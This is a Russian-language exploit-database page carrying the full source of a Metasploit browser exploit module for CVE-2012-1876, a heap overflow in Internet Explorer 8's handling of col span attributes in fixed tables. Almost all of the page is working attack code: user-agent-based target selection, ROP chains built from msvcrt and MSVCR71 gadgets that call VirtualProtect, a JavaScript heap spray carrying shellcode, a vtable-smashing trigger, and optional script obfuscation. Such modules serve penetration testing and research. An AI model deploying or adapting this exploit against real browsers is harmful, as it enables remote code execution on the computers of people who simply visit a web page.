Microsoft Internet Explorer Fixed Table Col Span Heap Overflow Exploit

Свойства

Дата публикации:
01.08.2012
Цель:
Microsoft Internet Explorer
Тип воздействия:
Компрометация системы

Код

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::Remote::BrowserAutopwn
    autopwn_info({
        :os_name    => OperatingSystems::WINDOWS,
        :ua_minver  => "8.0",
        :ua_maxver  => "8.0",
        :rank       => NormalRanking, # reliable memory corruption
        :javascript => true
    })

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Microsoft Internet Explorer Fixed Table Col Span Heap Overflow',
            'Description'    => %q{
                    This module exploits a heap overflow vulnerability in Internet Explorer caused
                by an incorrect handling of the span attribute for col elements from a fixed table,
                when they are modified dynamically by javascript code.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Alexandre Pelletier',                     # Vulnerability analysis
                    'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module
                    'binjo',                                   # Metasploit module
                    'sinn3r',                                  # Help with the Metasploit module
                    'juan'                                     # Help with the Metasploit module
                ],
            'References'     =>
                [
                    [ 'CVE', '2012-1876' ],
                    [ 'OSVDB', '82866'],
                    [ 'BID', '53848' ],
                    [ 'MSB', 'MS12-037' ],
                    [ 'URL', 'http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php'; ]
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                    'InitialAutoRunScript' => 'migrate -f'
                },
            'Payload'        =>
                {
                    'Space'         => 1024,
                    'BadChars'      => "\x00",
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Automatic', {} ],
                    [ 'IE 8 on Windows XP SP3 with msvcrt ROP',
                        {
                            'Rop' => :msvcrt
                        }
                    ],
                    [ 'IE 8 on Windows 7 SP1',
                        {
                            'Rop' => :jre
                        }
                    ]
                ],
            'Privileged'     => false,
            'DisclosureDate' => 'Jun 12 2012',
            'DefaultTarget'  => 0))

            register_options(
                [
                    OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
                ], self.class)
    end

    def get_target(agent)
        #If the user is already specified by the user, we'll just use that
        return target if target.name != 'Automatic'

        if agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
            return targets[1]  #IE 8 on Windows XP SP3
        elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
            return targets[2]  #IE 8 on Windows 7 with JRE
        else
            return nil
        end
    end

    def junk(n=4)
        return rand_text_alpha(n).unpack("V").first
    end

    def nop
        return make_nops(4).unpack("V").first
    end

    def get_payload(t)

        code = payload.encoded

        # Both ROP chains generated by mona.py - See corelan.be
        case t['Rop']
            when :msvcrt
                print_status("Using msvcrt ROP")
                exec_size = code.length
                rop =
                    [
                        0x77c4ec01, # retn
                        0x77c4ec00, # pop ebp; retn
                        0x77c15ed5, # xchg eax,esp; retn (pivot)
                        0x77c4e392, # pop eax; retn
                        0x77c11120, # <- *&VirtualProtect()
                        0x77c2e493, # mov eax, dword ptr ds:[eax]; pop ebp; retn
                        junk,
                        0x77c2dd6c,
                        0x77c4ec00, # pop ebp; retn
                        0x77c35459, # ptr to 'push esp; ret'
                        0x77c47705, # pop ebx; retn
                        exec_size,  # ebx
                        0x77c3ea01, # pop ecx; retn
                        0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
                        0x77c46100, # pop edi; retn
                        0x77c46101, # rop nop (-> edi)
                        0x77c4d680, # pop edx; retn
                        0x00000040, # newProtect (0x40) (-> edx)
                        0x77c4e392, # pop eax; retn
                        nop,        # nops (-> eax)
                        0x77c12df9  # pushad; retn
                    ].pack("V*")
            when :jre
                print_status("Using JRE ROP")
                exec_size = code.length
                rop =
                    [
                        0x7c346c0b, # retn
                        0x7c36f970, # pop ebp; retn
                        0x7c348b05, # xchg eax,esp; retn (pivot)
                        0x7c36f970, # pop ebp; retn [MSVCR71.dll]
                        0x7c36f970, # skip 4 bytes [MSVCR71.dll]
                        0x7c34373a, # pop ebx ; retn [MSVCR71.dll]
                        exec_size,  # ebx
                        0x7c3444d0, # pop edx ; retn [MSVCR71.dll]
                        0x00000040, # 0x00000040-> edx
                        0x7c361829, # pop ecx ; retn [MSVCR71.dll]
                        0x7c38f036, # &Writable location [MSVCR71.dll]
                        0x7c342766, # pop edi ; retn [MSVCR71.dll]
                        0x7c346c0b, # retn (rop nop) [MSVCR71.dll]
                        0x7c350564, # pop esi ; retn [MSVCR71.dll]
                        0x7c3415a2, # jmp [eax] [MSVCR71.dll]
                        0x7c3766ff, # pop eax ; retn [MSVCR71.dll]
                        0x7c37a151, # ptr to &VirtualProtect() - 0x0ef [IAT msvcr71.dll]
                        0x7c378c81, # pushad # add al,0ef ; retn [MSVCR71.dll]
                        0x7c345c30  # ptr to 'push esp; ret ' [MSVCR71.dll]
                    ].pack("V*")
        end

        code = rop + code
        return code
    end

    def on_request_uri(cli, request)

        agent = request.headers['User-Agent']
        my_target = get_target(agent)

        # Avoid the attack if the victim doesn't have the same setup we're targeting
        if my_target.nil?
            print_error("Browser not supported: #{agent}")
            send_not_found(cli)
            return
        end

        js_code =  Rex::Text.to_unescape(get_payload(my_target), Rex::Arch.endian(target.arch))

        table_builder = ''

        0.upto(132) do |i|
            table_builder << "<table style=\"table-layout:fixed\" ><col id=\"#{i}\" width=\"41\" span=\"9\" >&nbsp </col></table>"
        end

        # About smash_vtable():
        # * smash the vftable 0x07070024
        # * span => the amount to overwrite
        js_element_id = Rex::Text.rand_text_alpha(4)
        spray_trigger_js = <<-JS

        var dap = "EEEE";
        while ( dap.length < 480 ) dap += dap;

        var padding = "AAAA";
        while ( padding.length < 480 ) padding += padding;

        var filler = "BBBB";
        while ( filler.length < 480 ) filler += filler;

        var arr = new Array();
        var rra = new Array();

        var div_container = document.getElementById("#{js_element_id}");
        div_container.style.cssText = "display:none";

        for (var i=0; i < 500; i+=2) {
            rra[i] = dap.substring(0, (0x100-6)/2);
            arr[i] = padding.substring(0, (0x100-6)/2);
            arr[i+1] = filler.substring(0, (0x100-6)/2);
            var obj = document.createElement("button");
            div_container.appendChild(obj);
        }

        for (var i=200; i<500; i+=2 ) {
            rra[i] = null;
            CollectGarbage();
        }

        function heap_spray(){
            CollectGarbage();

            var shellcode = unescape("#{js_code}");

            while (shellcode.length < 100000)
            shellcode = shellcode + shellcode;
            var onemeg = shellcode.substr(0, 64*1024/2);
            for (i=0; i<14; i++) {
                onemeg += shellcode.substr(0, 64*1024/2);
            }

            onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
            var spray = new Array();

            for (i=0; i<400; i++) {
                spray[i] = onemeg.substr(0, onemeg.length);
            }
        }

        function smash_vtable(){
            var obj_col_0 = document.getElementById("132");
            obj_col_0.width = "1178993";
            obj_col_0.span = "44";
        }

        setTimeout(function(){heap_spray()}, 400);
        setTimeout(function(){smash_vtable()}, 700);
        JS

        if datastore['OBFUSCATE']
            spray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js)
            spray_trigger_js.obfuscate
        end

        # build html
        content = <<-HTML
        <html>
        <body>
        <div id="#{js_element_id}"></div>
        #{table_builder}
        <script language='javascript'>
        #{spray_trigger_js}
        </script>
        </body>
        </html>
        HTML

        print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

        # Transmit the response to the client
        send_response_html(cli, content)
    end

end

или введите имя

CAPTCHA